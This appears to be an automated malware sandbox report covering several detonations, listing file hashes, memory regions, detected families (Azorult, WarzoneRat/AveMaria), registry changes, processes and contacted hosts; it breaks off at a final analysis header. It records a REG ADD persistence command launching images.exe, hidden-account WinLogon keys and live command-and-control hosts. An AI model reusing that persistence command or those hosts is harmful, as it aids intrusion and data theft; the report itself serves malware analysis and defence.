memory/820-129-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmp
memory/1904-130-0x0000000004280000-0x00000000042D7000-memory.dmp
memory/1904-139-0x00000000050E0000-0x000000000515B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/240-148-0x0000000000400000-0x000000000055E000-memory.dmp
memory/240-150-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
C:\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/752-151-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
C:\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1956-157-0x0000000004835000-0x0000000004846000-memory.dmp
memory/1904-154-0x0000000004C15000-0x0000000004C26000-memory.dmp
\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/240-158-0x0000000000400000-0x000000000055E000-memory.dmp
memory/604-159-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1548-162-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
C:\ProgramData\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/364-165-0x0000000000170000-0x0000000000171000-memory.dmp
memory/364-161-0x0000000000000000-mapping.dmp
memory/364-167-0x0000000000290000-0x0000000000291000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/364-179-0x0000000000295000-0x00000000002A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1656-180-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1656-176-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1564-182-0x0000000000000000-mapping.dmp
memory/1564-183-0x0000000000160000-0x0000000000161000-memory.dmp
memory/1656-184-0x0000000001080000-0x0000000001180000-memory.dmp
memory/1604-186-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Roaming\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1604-191-0x0000000004B00000-0x0000000004B01000-memory.dmp
\Program Files\Microsoft DN1\sqlmap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/1604-199-0x0000000004B05000-0x0000000004B16000-memory.dmp
\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1752-202-0x000000000042010E-mapping.dmp
memory/1752-207-0x0000000004690000-0x0000000004691000-memory.dmp
memory/1656-208-0x0000000003EE0000-0x0000000003F56000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
Analysis: behavioral16
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
6s
Max time network
40s
Command Line
Signatures
Azorult
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
"C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 185.189.151.50:80 | 185.189.151.50 | tcp |
Files
memory/1656-61-0x00000000001D0000-0x00000000001D1000-memory.dmp
memory/1656-62-0x0000000000400000-0x0000000000BA7000-memory.dmp
memory/1656-63-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/1656-64-0x0000000076E11000-0x0000000076E13000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
11s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll,#1
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
133s
Max time network
138s
Command Line
Signatures
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Sets DLL path for service in the registry
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads user/profile data of web browsers
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\JovgAfA = "0" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\rfxvmt.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1816 set thread context of 608 | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe |
| PID 552 set thread context of 1576 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft DN1\sqlmap.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| File created | C:\Program Files\Microsoft DN1\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
"C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe"
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
Files
memory/1816-59-0x0000000000B00000-0x0000000000B01000-memory.dmp
memory/1816-61-0x0000000005010000-0x0000000005011000-memory.dmp
memory/1816-62-0x0000000005015000-0x0000000005026000-memory.dmp
memory/1816-63-0x0000000000AA0000-0x0000000000AF8000-memory.dmp
memory/1816-68-0x0000000006180000-0x00000000061FB000-memory.dmp
memory/608-69-0x0000000000400000-0x000000000055E000-memory.dmp
memory/608-70-0x0000000000405E28-mapping.dmp
memory/608-71-0x00000000752B1000-0x00000000752B3000-memory.dmp
memory/608-72-0x0000000000400000-0x000000000055E000-memory.dmp
memory/968-73-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/552-75-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
C:\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1196-78-0x0000000000000000-mapping.dmp
memory/552-79-0x0000000000D30000-0x0000000000D31000-memory.dmp
memory/552-81-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/552-82-0x0000000004DE5000-0x0000000004DF6000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1576-91-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1576-94-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/384-96-0x0000000000000000-mapping.dmp
memory/384-97-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/1576-98-0x0000000003990000-0x0000000003A90000-memory.dmp
\Program Files\Microsoft DN1\sqlmap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/1576-100-0x0000000004260000-0x00000000042E4000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
Analysis: behavioral17
Detonation Overview
Submitted
